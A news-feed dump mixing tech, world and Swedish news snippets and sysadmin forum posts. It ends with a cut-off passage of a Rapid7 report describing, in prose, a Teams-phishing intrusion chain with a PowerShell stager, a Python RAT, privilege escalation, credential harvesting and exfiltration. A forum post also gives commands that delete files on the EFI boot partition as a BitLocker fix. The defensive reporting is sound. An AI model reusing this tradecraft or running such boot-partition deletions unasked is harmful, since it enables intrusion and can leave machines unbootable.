Instagram is once again cribbing from competitors like Snapchat and BeReal with a new photo-sharing format it calls "Instants," which are ephemeral photos that you can't edit and that you can only share with your close friends or followers that follow you back. Instants are available globally beginning on Wednesday as a feature in the […]

MicroMarketing specializes in expert title selections for books, audio CDs, and DVDs, catering primarily to librarians and libraries. The company is known for its personalized service, ensuring that clients receive timely and efficient support without automated responses. They offer valuable services such as downloadable invoices and MARC records, along with a strong price-value proposition. MicroMarketing's commitment to quality and customer satisfaction has garnered positive testimonials from clients who appreciate their reliable and responsive service

Pamil Modulsystem specializes in renting flexible modular buildings tailored for various needs, including offices and schools. Established in 1963, the company focuses on providing high-quality, customizable solutions that enhance work and learning environments. They manage the entire process from planning and construction to maintenance, ensuring a seamless experience for their clients. Committed to sustainability, Pamil emphasizes circular building practices by renovating returned modules for future use.

Tricon Infotech delivers efficient, automated solutions and full digital transformations through custom products and enterprise implementations. The company's worldwide clients include leaders in the publishing, educational technology, finance, and legal sectors

We use cradlepoint's and with their somewhat newish move to requiring a subscription to configure the device you own, in addition to their cost - we're looking at alternatives. We have FortiGate firewalls and I tried their FortiExtender and that product is not great. Someone recommended we try Inseego's Wavemaker FX4200 - which I did and purchased their Inseego Connect Advanced license (required for IPSec VPN configuration) and it's been a terrible experience - their connect GUI is littered with random bugs, no troubleshooting tools & support doesn't exist? Still trying to figure this one out. Our current list of requirements: 5G Cellular Less expensive than Cradlepoint (hardware/subscription) Centrally managed Supports VPNs We were looking at Ubiquiti - their Dream router 5g max would be cool but there's no central management. Looks like their other gateways + 5g modem are though. Never used their gateways before (only their APs & switches) submitted by /u/P_R_woker [link] [comments]

BBC correspondents look at some of the new bills Sir Keir Starmer's government wants to pass.

Fervo Energy's IPO was upsized several times after potential investors asked why the enhanced geothermal startup wasn't raising more money.

IMF ser tecken på att den svenska ekonomin tar fart under 2026, med fortsatt BNP-tillväxt och förbättrad köpkraft för hushållen.Samtidigt pekar fonden på en osäker omvärld med krig, energipriser och ett sårbart finanssystem, medan SEB:s chefsekonom Jens Magnusson framhåller att Sveriges utgångsläge är bättre än i många andra länder.I inslaget ställs IMF:s varningar mot bilden av en ekonomi där just hushållens försiktighet blivit den svaga punkten.

A paediatrician at a hospital near Berlin has been charged with sex offences in 130 cases, many of which are said to have taken place at the hospital, prosecutors said on Wednesday. The extent of the offences, which include serious sexual abuse of children and rape, had previously been unknown. The paediatrician has been in pre-trial custody since November, with prosecutors citing a risk of reoffending as a reason for the man’s continued detention. In January, it became known that the doctor was...

Hur mycket dyrare blir bensinen om Helldén får bestämma – och vad är han bättre på än kollegan Amanda Lind? MP:s språkrör svarar på publikens frågor direkt från sitt privata kontor, ingen fråga är förbjuden!

Microsoft has responded to the MacBook Neo by commissioning a study that highlights advantages of some Windows laptops. Market research firm Signal65 evaluated four Windows laptops:Lenovo's IdeaPad Slim 3x Lenovo's Yoga 7i HP's OmniBook 5 HP's OmniBook X FlipWith a starting price of $549.99 on Best Buy's online store in the U.S. at the time of this writing, the IdeaPad Slim 3x is the only laptop in the study that currently rivals the MacBook Neo's starting price of $499 (college students) to $599 (general public). The other three laptops currently start at $749 to $1,029 at Best Buy. Signal65 outlined some of the IdeaPad Slim 3x's advantages over the MacBook Neo: Feature IdeaPad Slim 3x MacBook Neo Display Size 15.3-inch 13-inch CPU Snapdragon X1 with "90% faster" multi-core Cinebench 2026 score A18 Pro Base RAM 16GB 8GB Fingerprint Scanner Included Touch ID limited to $699 model Ports 1× USB-C, 2× USB-A, SD, and HDMI 2× USB-C only Wi-Fi Wi-Fi 7 Wi-Fi 6E Backlit Keyboard Yes No Touch Screen Yes No In addition, the IdeaPad Slim 3x achieved longer battery life (16 hours and 29 minutes) compared to the MacBook Neo (13 hours and 28 minutes) in a Tom's Guide test, with Lenovo able to fit a larger battery inside a 15-inch laptop. The study indicated that the IdeaPad Slim 3x has 512GB of storage, but the $549.99 base model has a 256GB SSD, which matches the MacBook Neo. Through June 30, Microsoft is offering U.S. college students a free one-year Microsoft 365 Premium subscription, a free one-year Xbox Game Pass Ultimate subscription, and a free Xbox controller with the purchase of a qualifying Windows laptop, including the IdeaPad Slim 3x. The bundle has a value of more than $500. On the other hand, the MacBook Neo has some advantages over the IdeaPad Slim 3x: Feature MacBook Neo IdeaPad Slim 3x Display Resolution 2,408×1,506 pixels (Retina quality) 1,920×1,200 pixels Display Brightness 500 nits 300 nits Build Material Fully aluminum enclosure Mix of aluminum and plastic Webcam 1080p camera 720p camera Moreover, many reviewers indicated that the MacBook Neo has a superior trackpad and speakers compared to Windows laptops within the same price range. Plus, the MacBook Neo runs macOS instead of Windows, so it benefits from Apple's tight hardware and software integration and features that work across multiple Apple devices. While it is unsurprising that this Microsoft-backed study is focused on promoting Windows laptops, the reality is that the MacBook Neo and the IdeaPad Slim 3x both have pros and cons. More competition in the affordable laptop market is a win overall.Related Roundup: MacBook NeoTags: Lenovo, Microsoft, WindowsBuyer's Guide: MacBook Neo (Buy Now)Related Forum: MacBook NeoThis article, "New Study Highlights Advantages of $549 Windows Laptop Over MacBook Neo" first appeared on MacRumors.comDiscuss this article in our forums

N/A

N/A

Den variant av hantavirus som har spridits på MV Hondius skiljer sig inte från liknande virusutbrott, enligt den europeiska smittskyddsmyndigheten ECDC. Samtidigt väntas fler personer insjukna de närmsta veckorna. – Det är en väldigt komplex situation, säger ECDC-chefen Pamela Rendi-Wagner.

Two children are among those reported dead after seven cars were struck in separate attacks south of Beirut.

Här är ett urval av händelserna i Västsverige under onsdagen den 13 maj.

Jose Mourinho is set to be appointed Real Madrid's new manager. Spanish football expert Guillem Balague explains why.

Driver recovery can automate what used to be an irritating manual process.

Ståltillverkaren Stegra har kommit överens med långivare om att frigöra outnyttjade krediter enligt tidigare låneavtal på drygt 16 miljarder kronor, det rapporterar Bloomberg. Enligt uppgifter till nyhetsbyrån har bolaget tidigare inte uppfyllt vissa villkor och milstolpar som krävts för att få tillgång till pengarna. I april gick familjen Wallenberg in som största ägare i det pressade bolaget, då släppte långivare loss nära 10 miljarder kronor i redan överenskomna lån som varit frysta sedan årsskiftet.

X’s new History tab combines bookmarks, likes, watched videos, and read articles into a single place, expanding the app’s role as a save-it-for-later tool.

The probe will examine whether the Reform UK leader should have declared the gift from crypto billionaire.

The Nitrogen ransomware group claims to have hacked the company’s systems, stealing 8TB of data, including confidential documents. The post Foxconn Confirms North American Factories Hit by Cyberattack appeared first on SecurityWeek.

"We know what customers need right now.”

Noam Bettan was met with a mixture of cheering, boos and chants as he performed in Vienna on Tuesday night.

Nigel Farage, ledare för högerpopulistiska Reform UK, utreds för att ha tagit emot fem miljoner pund utan att redovisa detta, rapporterar brittiska medier .

We are stuck on "We are preparing a mailbox for the user." submitted by /u/min5745 [link] [comments]

Since Intel Meteor Lake has been the Intel Silicon Security Engine to serve as a silicon root-of-trust for secure firmware loading, boot measurements, and similar functionality. This Intel Silicon Security Engine has been built on with Lunar Lake and Panther Lake as well as set to take on more importance with future Intel hardware platforms. We are now seeing a Linux driver come for this silicon RoT with the Intel Silicon Security Engine Interface (ISSEI)...

The US president says his first request to Xi would be to "open up" China, while Beijing is expected to press Trump on the status of Taiwan.

En man i 30-årsåldern hemmahörande i Östersunds kommun döms till fängelse i två år och tre månader för att ha våldtagit ett barn. Han döms även för misshandel och olaga hot, men frikänns för grovt olaga hot och grovt övergrepp i rättssak.

The German Sovereign Tech Fund has invested 1.2 million euros ($1.4 million USD) in KDE Plasma technologies to help strengthen the structural reliability and security of the desktop environment's core infrastructure, including Plasma, KDE Linux, and the frameworks underlying its communication services. Longtime Slashdot reader jrepin shares an excerpt from the announcement: For 30 years, KDE has been providing the free and open-source software essential for digital sovereignty in personal, corporate, and public infrastructures: operating systems, desktop environments, document viewers, image and video editors, software development libraries, and much more. KDE's software is competitive, publicly auditable, and freely available. It can be maintained, adapted, and improved in-house or by local software companies. And modifications (along with their source code) can be freely distributed to all users and departments within an organization. KDE will use Sovereign Tech Fund's investment to push its essential software products to the next level, providing every individual, business, and public administration with the opportunity to regain their privacy, security, and control over their digital sovereignty. Slashdot reader Elektroschock also shared a statement from Fiona Krakenburger, Technical Director at the Sovereign Tech Agency. "We have long invested in desktop technologies for a reason: they are the primary way people access and use digital services in everyday life," says Krakenburger. "The desktop holds personal data and mediates nearly every service we depend on, from booking the next medical appointment, to education, to the way we work. We are investing in KDE because it is one of the two major desktop environments used across Linux and plays a key role in how millions of people experience open technology. Strengthening KDE's testing infrastructure, security architecture, and communication frameworks is how we invest in the resilience and reliability of the core digital infrastructure that modern society depends on." Read more of this story at Slashdot.

The feature lets users share disappearing photos with their Close Friends or mutual followers that can be viewed only once and remain available for 24 hours.

N/A

Meta CEO Mark Zuckerberg says its new Incognito Chat is "the first major AI product where there is no log of your conversations stored on servers." Messages in Incognito Chat aren't saved or stored in users' chat history, similar to incognito modes on other AI chatbots, but Meta says its version is different because it […]

Hey HN! We’re Vikram and Evan from Ardent (https://tryardent.com). We're building database sandboxes for you and your coding agents.In the last two years coding agents have gotten dramatically more capable at handling complex engineering tasks. But without access to a realistic sandbox at the DB layer for testing, they ship garbage that can take down production databases. I spent over a year building an AI Data Engineer that failed for this exact reason. Evan spent the last 12 years in data engineering and hit this wall building agents at his last company.Ardent was built to make it possible for coding agents to get near instant access to production-like sandboxes so they can test their work. To do this we write a replication stream out of the target DB, scaling with kafka onto a read replica with copy on write enabled and autoscaling compute (we currently prefer neon as a primary branching engine due to their implementation of these properties).Our replication stream uses logical replication + ddl triggers to enable usage on any hosted postgres DB since most platforms do not allow physical replication which is traditionally used for creating replicas.This provides a few primary benefits:1. Does not require a platform migration to a DB provider like neon, allowing strong separation of production and development concerns. 2. Minimal impact on the production database while allowing clones to spin up in

AI rollback rates hit 81% at firms with mature guardrails, suggesting enterprises are struggling to manage the systems in production, says Sinch

Q Manivannan, originally from India, is on a student visa which is due to expire at the end of the year.

Trafikverkets varning: rådjur på vägen på E20 Alingsås Tidning

Having a bunch of user accounts being locked out through out this morning after Patch Tuesday. Anyone seeing any similar issues? Event ID: 4740 Weird this is that there isn't anything listed for Caller Computer Name submitted by /u/SluggoManiac [link] [comments]

The Princess of Wales travels to Reggio Emilia, to learn about its approach to early years education.

England director of cricket Rob Key said Ollie Robinson is "one of the best bowlers in the world" after ending the Sussex seamer's two-year international exile.

The ship, which set sail from Belfast on Friday, is at port in Bordeaux after 49 people fell ill from gastrointestinal illness.

I Ukraina har minst sex personer dödats och tiotals skadats i ryska attacker, uppger Volodymyr Zelenskyj. Bland de döda ska det finnas barn. Sedan midnatt har Ryssland avfyrat minst 800 drönare, uppger presidenten i ett inlägg på X. Det är en av de mest massiva attackerna sedan den fullskaliga invasionens start, enligt Zelenskyj. Han tillägger att Ryssland medvetet attackerat regioner nära Nato-ländernas gränser.

Valdo Calocane's brother, Elias, told a public inquiry he felt "powerless" when it came to his illness.

First I admit this is tangentially a sys admin issue. But today after a lot of iPhone users updated their work phones to the latest iOS teams seems to making itself the default app for FaceTime and cell calls, which if they aren't lisc for teams voip just shits the bed. We've tested on a phone going into several default locations to change the defaults back to FaceTime/cell but even after these changes when clicking on a contact and selecting FaceTime some contacts still use teams. Uninstalling teams seems to resolve the issue, but isn't a functional option. Anyone else dealing with this, or resolved it as scale? submitted by /u/ExceptionEX [link] [comments]

Six people have been killed after Zelensky warned of "more waves" of Russian strikes through Wednesday.

A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]

Physicist warns proposed Stratos campus could seriously affect local environment

Mind Robotics, which was first revealed in late 2025, has now raised more than $1 billion to date.

BISO = Business Information Security Officer I honestly don't know what this person should be doing in this role. He's acting like a glorified but unskilled project manager and passing along raw output CSVs with unsorted data from scanning tools. I just wish I knew what he was supposed to be doing for us. submitted by /u/tfm217 [link] [comments]

But training on "synthetic stories" that model good AI behavior can help.

"I believe I am an honest and trustworthy business person," Altman testified in federal court.

6 grader och mulet och regnskurar i Alingsås under kvällen Alingsås Tidning

Maybe I'm just punch-drunk in my third week attending Musk v. Altman, but I have become very, very fond of Microsoft during the course of this trial. They don't want to be here any more than I do. Their opening statement was honestly one of the most Microsoft things I've ever seen. More than anything […]

This morning I have had 4 different users report an identical issue: User goes to log into their domain-joined Windows PC, puts in their normal password, gets an incorrect password error. Restarting the computer leads to the same thing happening. I reset their password for them, give them the temporary, and the same thing happens. Whether I'm putting it in for them or they're typing it themselves, incorrect password each time. So I log into my account, no problems logging in at all. I do nothing, log out, have them attempt again, and now suddenly they can log in with no issue. Never seen this particular issue before, but it's weird that I'm suddenly getting multiple users across different sites having this identical issue today. Extra info: checked the last password change date, and all users had not changed their passwords recently, so it's not like they got reset without them knowing. EDIT: Resetting password not required, just checked with another user. I logged in, logged out, and they could log in just fine. EDIT 2: Running Test-ComputerSecureChannel once I log in returns True. EDIT 3: A tech was addressing this issue with someone, and he didn't even log in, he just had the user put in their username/password under Other User and this worked, even though the cached "last logged in" page didn't work with the same password. submitted by /u/3100gutter [link] [comments]

Norsk säkerhetspolis varnar för att ryska underrättelsetjänster aktivt försöker rekrytera ukrainare som flytt till Norge.Från svenskt håll säger Säpo att Ryssland fortlöpande försöker rekrytera agenter även i Sverige, men att det inte är aktuellt att gå ut med en liknande varning.Enligt Gabriel Wernstedt, presstalesperson vid Säpo, har man de senaste åren i Europa sett en rekrytering av så kallade förbrukningsagenter – ett fenomen man även följer i Sverige.

Article URL: https://www.haiku-os.org Comments URL: https://news.ycombinator.com/item?id=48124002 Points: 109 # Comments: 50

Origin Lab will serve as a marketplace where AI labs can buy high-quality licensed data, and video-game companies can sell it.

Security pros warn YellowKey claim could make stolen laptops a much bigger problem

Apple has stepped in to warn that EU proposals to force Google to open Android to competing AI services pose serious risks to user privacy, security, and safety. Apple's latest submission to the EU comes (via Reuters) in response to the European Commission's call for feedback on draft measures designed to help Google comply with the Digital Markets Act (DMA). The proposals would allow competing AI services to interact with Android apps to perform actions such as sending emails, ordering food, or sharing photos. Google has already pushed back on the plans, arguing they would undermine key privacy and security safeguards for European users. Apple, which is itself now subject to EU measures requiring it to open up its own ecosystem, said it has a strong interest in the case given its own operating systems for iPhone, iPad, and Mac. In its submission, Apple said the draft measures "raise urgent and serious concerns," warning that if confirmed, "they would create profound risks for user privacy, security, and safety as well as device integrity and performance." Apple also took aim at the rapidly evolving state of AI as a particular source of concern, arguing that risks are "especially acute in the context of rapidly evolving AI systems whose capabilities, behaviours, and threat vectors remain unpredictable." The company questioned the EU's technical expertise in drawing up the proposals, stating that the Commission is "substituting judgments made by Google's engineers for its own judgment based on less than three months of work," and suggesting the only discernible goal of the draft measures is "open and unfettered access." Apple has a long history of clashing with EU regulators over the DMA. The company challenged the regulation in court in October 2025, and urged regulators to scrap it entirely the month before, arguing it had created security vulnerabilities and worsened the user experience. The EU said it had no intention of repealing the law in response. The feedback period for the proposals ran from April 27 to May 13, 2026. The European Commission has said it will carefully assess all submissions and may adjust the proposed measures as a result, though its final decision must be adopted within six months of the opening of the specification proceedings, giving a deadline of July 27, 2026. The EU separately concluded in May 2026 that the DMA has had a positive impact overall, setting aside Apple's lobbying for the regulation to be revised.Tags: Europe, European Commission, European Union, Google, ReutersThis article, "Apple Defends Google Against EU Proposal to Give AI Rivals Access to Services" first appeared on MacRumors.comDiscuss this article in our forums

Idag inleddes rättegången mot Fotrotnätverkets Poya Shafie, som pekas ut som en av gängledaren Rawa Majids närmsta män.Åklagarna har under dagen försökt visa på kopplingar mellan den åtalade och Foxrotnätverket, bland annat genom att visa bilder på honom med rävringar som blivit en symbol för nätverket och på honom tillsammans med ledaren.Poya Shafie misstänks för flera grova våldsbrott, bland annat förberedelse och stämpling till mord på en person kopplad till Dalen-nätverket i Sundsvall.

Former wicketkeeper Sarah Taylor named England's fielding coach, making her the first woman to coach an England side in a major sport.

Före detta Gerdsken-profilen gör succé i Elfsborg Alingsås Tidning

Microsoft’s MDASH discovered 16 of the Patch Tuesday vulnerabilities, and Palo Alto used Mythos to find dozens of flaws. The post Microsoft, Palo Alto Networks Find Many Vulnerabilities by Using AI on Their Own Code appeared first on SecurityWeek.

Security leaders discuss the first AI-created zero-day exploit.

For founders and investors, Anthropic's new offering signals that the AI platform wars are expanding downmarket and that the next major battleground for user acquisition isn't the Fortune 500; it's the 36 million small businesses that make up the backbone of the U.S. economy.

Harvard faculty are voting on a proposal (PDF) to curb grade inflation by limiting solid A grades to 20% of students in a class, plus four additional A's per course. Axios reports: Grade inflation is at a tipping point at Harvard. A move to make A grades harder to come by at one of the world's leading universities could influence grading debates at peer institutions. Solid A's account for nearly two-thirds of all undergraduate letter grades. That's up from roughly a quarter 20 years ago. More than 50 members of last year's class graduated with perfect GPAs. [...] Faculty are voting on three separate provisions. Each requires a simple majority to pass. A cap to limit solid-A grades to 20% of enrolled students in a class, plus four additional A's per course. Changes to how internal honors are calculated, moving from traditional grade point average scoring to an average percentile rank. Allowing courses to use new "satisfactory" or "unsatisfactory" marks with a "satisfactory-plus" distinction. A pre-vote faculty poll showed around 60% of the 205 respondents favored the 20-plus-four formula over an alternative. Supporters of the cap argue it's intentionally modest as it places no restrictions on A-minuses. The four-grade buffer is designed to protect small seminars where a higher proportion of students may succeed. [...] If passed, changes would take effect in fall 2027, followed by a mandatory three-year review. Read more of this story at Slashdot.

Washington and Beijing have piled on irritants in advance of this week’s summit between US President Donald Trump and his Chinese counterpart Xi Jinping, suggesting that neither side wants to be seen as a deal killer – even as they try to build potential leverage to bargain away, analysts and former US government officials said. Scott Kennedy, senior adviser with the Centre for Strategic and International Studies (CSIS), said that both sides had been “picking up some chits which they might be...

TLDR; The EFI partition was full from prior HP firmware updates, leaving old BIOS files in \EFI\HP folder which prevented the UEFI update process from completing, which caused BitLocker to fail. In case I can save someone else some time. I had a laptop promting for the Bitlocker Recovery key on every boot / wake from hibernation. I decrypted the drive thinking I'd just re-encrypt which can sometimes fix this. However, Bitlocker would throw an error about "The system cannot find the file specified" when I tried to encrypt the drive again. The April 2026 Windows update tried to install the 2023-signed boot manager, but the boot manager update failed with 0x80070070 (disk full) and servicing got stuck with UEFICA2023Status = NotStarted. So Secure Boot ended up in a weird state with the 2023 certs in the DB, but still running the 2011 signed boot manager. PCR7 was showing "PCR7 binding not possible". So BitLocker validation failed because Secure Boot was borked and the "file not found" error was BitLocker giving up at that validation step because the missing boot manager update meant it literally couldn't find files it expected to be there. To fix: diskpart list disk select disk 0 (replace with your disk number) list partition select partition X (the EFI System partition, usually ~100MB, type "System") assign letter=S exit S: cd EFI rmdir /s /q HP (or your vendor) Trigger the boot manager update phase: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Secureboot" /v AvailableUpdates /t REG_DWORD /d 0x100 /f Run the scheduled task: schtasks /run /tn "\Microsoft\Windows\PI\Secure-Boot-Update" reboot and check the servicing status at HKLM\SYSTEM\CurrentControlSet\Control\Secureboot\Servicing Enable BitLocker again submitted by /u/MediumFIRE [link] [comments]

Has anyone in corporate purchasing had Dell unilaterally terminate a PC/laptop supply contract due to pricing being too low? submitted by /u/Ghoghogol [link] [comments]

Early galaxy has elements produced by the Universe's first supernovae.

Following last week's disclosure of the Dirty Frag vulnerability for the Linux kernel, which only finished being patched up in mainline on Monday, Fragnesia is now public as a similar local privilege escalation (LPE) vulnerability...

Article URL: https://grantmestrength.github.io/S100/ Comments URL: https://news.ycombinator.com/item?id=48123546 Points: 51 # Comments: 9

Tomorrow's webinar examines why prevention alone is no longer enough against modern cyberattacks. The session explores how organizations combine security, backups, and recovery planning to improve cyber resilience after attacks. [...]

Microsoft has addressed a known issue causing some Windows 11 systems to boot into BitLocker recovery after installing the April 2026 Windows security updates. [...]

A ransomware group has claimed responsibility for hacking the electronics manufacturing giant Foxconn and is attempting to extort the company.

Following last month's coverage of an unofficial Mac port of Notepad++ that the original developer called out for trademark violation, the dispute has now been resolved with a rebrand. The macOS port was previously released by Andrey Letov under the Notepad++ name without authorization. Don Ho created the original Windows code editor in 2003, and had publicly objected to the unofficial app's use of his trademark and the inclusion of his name and biography on its author page. After settling the dispute, the app has subsequently been renamed Nextpad++. The site for Nextpad++ has been thoroughly updated and clearly states that the app is an "open-source and independent community port of Notepad++ to macOS." Elsewhere, Letov's About page describes the project as a Mac port of the Notepad++ GPL codebase, built on Objective-C++, Scintilla, and Cocoa, and shipped as a universal binary for Apple silicon and Intel Macs. The app also has a new icon. Names aside, it seems Daring Fireball's John Gruber is less than charmed by the result, describing the app as feeling "unholy" and suggesting the rapid port could only have been built with AI vibe-coding tools. The site states development began on March 10. Have you tried out Nextpad++ for Mac? Let us know what you think in the comments.This article, "Notepad++ Mac Port Renamed Nextpad++ After Trademark Row" first appeared on MacRumors.comDiscuss this article in our forums

The court has ordered a new trial over the June 2021 killings of Paul and Maggie Murdaugh.

Following a series of cryptic newspaper ads and Instagram teasers that had watch fans speculating about its next collaboration, Swatch announced a new timepiece collection created with luxury watchmaker Audemars Piguet. Inspired by Swatch's iconic Pop watches from the '80s and Audemars Piguet's Royal Oak timepieces that first debuted in 1972, the new Audemars Piguet […]

Police commandos entered the building where a senator wanted by the International Criminal Court had sought refuge.

Article URL: https://kotaku.com/kickstarter-is-the-latest-platform-seemingly-forced-to-ban-adult-content-by-payment-processors-2000695648 Comments URL: https://news.ycombinator.com/item?id=48123198 Points: 231 # Comments: 178

En 21-årig man är häktad i sin utevaro vid Uppsala tingsrätt. Bland annat misstänks han ligga bakom att tre termosbomber placerades ut i Svartbäcken under Uppsala Marathon. Enligt SVT:s källor tillhör han toppskiktet i det kriminella Foxtrotnätverket. Nu jagas han internationellt och är en av de mest prioriterade på Europols lista över efterlysta personer.

French prosecutors on Wednesday requested a seven-year prison sentence for former president Nicolas Sarkozy in an appeal trial on charges that he sought Libyan financing for his 2007 election. Sarkozy, France’s right-wing leader from 2007 to 2012, has always denied any wrongdoing but last year became modern France’s first former president to have gone to jail over the case, before he was released after 20 days pending his appeal trial. Prosecutors had also requested seven years in the first...

Tidöpartierna går nu vidare med förslag till lagrådet om att bland annat begränsa friskolors möjligheter att göra värdeöverföringar som att dela ut vinst.Det handlar bland annat om ett värdeöverföringsförbud de första åren för en nystartad skola, när en skola byter ägare och vid vissa verksamhetsbrister.Förslagen får stark kritik från såväl friskolebranschen som anser att de straffar skolor med hög kvalitet som från Socialdemokraterna som anser att förslaget är verkningslöst och att friskolorna kommer kunna fortsätta ta ut vinst.

Patch series would bring memory-safe code to Linux's s390 port, with compiler caveats attached

Article URL: https://fortune.com/2026/05/12/lake-tahoe-data-center-49000-residents-power-source/ Comments URL: https://news.ycombinator.com/item?id=48123090 Points: 88 # Comments: 83

En tolvårig flicka har mot sitt nekande gjort sig skyldig till att försöka spränga två handgranater i Borås i höstas och dessutom ha fraktat dem i kollektivtrafiken. Det fastställde Borås tingsrätt under onsdagen då de meddelat dom i ett mål om bevistalan.Enligt kammaråklagare Louise Bremander finns en misstänkt anstiftare som ska ha styrt flickan. Han är häktad i sin utevaro och förnekar brott.Mannen kopplas till det kriminella nätverket Foxtrot och bedöms finnas utomlands.

The bodies of three women have been recovered from the sea off Brighton. Sussex Police said emergency services were called after concerns were raised for the women’s welfare at around 5.45am on Wednesday, and their bodies were pulled from the water near Madeira Drive. Chief Superintendent Adam Hays said the coastguard is completing an “extensive search of the water”, but the force is not searching for anyone else. The officer said CCTV inquiries are being carried out. Following the incident,...

Article URL: https://ossresistance.com/ Comments URL: https://news.ycombinator.com/item?id=48123015 Points: 138 # Comments: 53

REI’s annual Anniversary Sale doesn’t start until March 15th, but that hasn’t stopped Garmin from rolling out discounts on a range of devices — including its InReach Mini satellite communicators. Right now, for instance, you can grab the Mini 2 at Amazon, REI, and Garmin for $249.99 ($150 off) or the Mini 3 for $399.99 ($50 […]

Gränsöverskridande tågresor kan bli lättare att boka. EU vill samla biljetter från olika operatörer och stärka passagerarnas skydd vid fel i resan.

US President Donald Trump arrived in China – flanked by his top aides and American tech leaders – on Wednesday night as Beijing rolled out a lavish welcome ceremony at the airport. He was received by Chinese Vice-President Han Zheng at Beijing Capital International Airport. Trump’s entourage includes Jensen Huang, CEO of Nvidia and a last-minute addition to the trip, as well as US Defence Secretary Pete Hegseth, US Secretary of State Marco Rubio, billionaire entrepreneur Elon Musk and Tim Cook...

An anonymous reader quotes a report from Reuters: Meta employees distributed flyers at multiple U.S. offices on Tuesday to protest the company's recent installation of mouse-tracking software on their computers, according to photos of the pamphlets seen by Reuters. The flyers, which appeared in meeting rooms, on vending machines and atop toilet paper dispensers at the Facebook owner's offices, encouraged staffers to sign an online petition against the move. "Don't want to work at the Employee Data Extraction Factory?" they asked, according to the photos seen by Reuters. [...] The pamphlets and the petition both cite the U.S. National Labor Relations Act, saying "workers are legally protected when they choose to organize for the improvement of working conditions." In the UK, a group of Meta employees has started organizing a drive for unionization with United Tech and Allied Workers (UTAW), a branch of the Communication Workers Union. The employees set up a website to recruit members using the URL "Leanin.uk," a reference to former Chief Operating Officer Sheryl Sandberg's best-selling book encouraging women to seek equal footing in the workplace. "Meta's workers are paying the price for management's reckless and expensive bets. While executives chase speculative AI strategies, staff are facing devastating job cuts, draconian surveillance, and the cruel reality of being forced to train the inefficient systems being positioned to replace them," said Eleanor Payne, an organizer with UTAW. "If we're building agents to help people complete everyday tasks using computers, our models need real examples of how people actually use them -- things like mouse movements, clicking buttons, and navigating dropdown menus," said a statement Meta issued earlier. Read more of this story at Slashdot.

Alexa for Shopping offers a voice- and touch-enabled shopping experience across mobile, desktop, and Echo Show smart displays. Alexa for Shopping provides more personalized recommendations and automates the shopping experience across Amazon and other online retailers.

New “Sweet Attack” platform uses runtime intelligence and continuous agentic red teaming to identify exploitable attack chains human teams may miss. The post Sweet Security Launches Agentic AI Red Teaming to Counter ‘Mythos Moment’ appeared first on SecurityWeek.

SSAB:s gröna omställning i Oxelösund försenas sedan en elledning stoppats mitt under bygget.Vattenfall, som bygger ledningen från Hedenlunda till stålverket, pekar på brister i regelverket, medan två fågelorganisationer överklagat med hänvisning till risken att tjädrar flyger in i kablarna.Trots nio års arbete och att 210 av 250 kraftledningsstolpar är resta kan ändringar nu tvinga fram en helt ny tillståndsprocess.

Article URL: https://fredchan.org/blog/locality-domains-guide/ Comments URL: https://news.ycombinator.com/item?id=48122635 Points: 297 # Comments: 82

After achieving $2.2 billion in revenue in 2025, the defense tech startup has raised another massive round, led by Thrive and a16z, it says.

OverviewAttackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust.In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.Therefore, this attack was particularly concerning due to the way the intrusion shifted from endpoint compromise to broader identity-driven risk. And while it was not surprising that the attacker used a novel technique, what was concerning was how the attacker was able to chain together familiar enterprise weaknesses into a fast-moving and operationally effective intrusion.By abusing Teams external access, the threat actor delivered a Dropbox-hosted Python payload that established command-and-control, deployed multiple backdoors, and began mapping the internal environment. The attacker then escalated privileges to SYSTEM using CVE-2023-36036 before deploying a fake Windows lock screen designed to harvest the user’s domain password.Once valid credentials were obtained, the intrusion shifted from endpoint compromise to broader identity-driven risk. The attacker moved laterally to a second host, used legitimate tooling such as DumpIt to collect system memory, which was likely exfiltrated via an anonymous file-sharing service. This progression underscores a key reality for defenders: Once collaboration, identity, and endpoint controls are bypassed or weakened, attackers can rapidly convert initial access into meaningful enterprise exposure.Rapid7’s technical analysis linked the Python malware to ModeloRAT, a framework previously documented by multiple security vendors in browser extension campaigns and associated with the KongTuke group. More broadly, this intrusion demonstrates how trusted communication channels, Living-off-the-Land techniques, and credential-focused tradecraft continue to challenge traditional security controls. The takeaways here are clear:For CISOs: Collaboration tools are part of your attack surface. Attackers used Teams to reach users directly. Security, identity protection, endpoint visibility, and rapid detection engineering must be treated as connected parts of the same defense strategy, not separate control domains.For defenders: Old vulnerabilities and trusted tools still work. The attack combined a patched vulnerability (CVE-2023-36036) with widely trusted tools like Python, PowerShell, and Dropbox. None of these are unusual in enterprise environments, which is precisely what allowed the attacker to blend in while moving quickly. It’s an obvious restatement, but external access should always be controlled and monitored. The challenge isn’t identifying one suspicious event; it’s recognizing when normal activity starts to form a pattern, and acting before that pattern turns into widespread exposure.Rapid7 coverageRapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration.A door that was never closedThe intrusion started with abuse of Microsoft Teams external access. This feature, enabled by default in some environments, allows users in one tenant to initiate direct chats with users in another. In our incident, the attacker used a newly created tenant UCICasociacion.onmicrosoft[.]com to impersonate “IT Support” and messaged a targeted employee.This approach mirrors tradecraft seen in Octo Tempest-style campaigns. Octo Tempest (alias Scattered Spider, UNC3944, 0ktapus) is a financially motivated cybercriminal group active since 2022, known for aggressive social engineering tactics including helpdesk impersonation, SIM swapping, and MFA manipulation. Shortly after the interaction, a hidden PowerShell command executed on the victim’s machine, staging the initial payload.Stager: Bring your own PythonWithin minutes of the Teams interaction, a PowerShell stager executed on the endpoint and reached out to Dropbox to retrieve a ZIP archive (Winp.zip) into the user’s AppData directory.The archive was immediately extracted and deleted, likely to reduce on-disk artifacts and avoid potentially raising suspicion.The payload contained a portable WinPython environment, which the attacker used to launch the next stage:collector.py 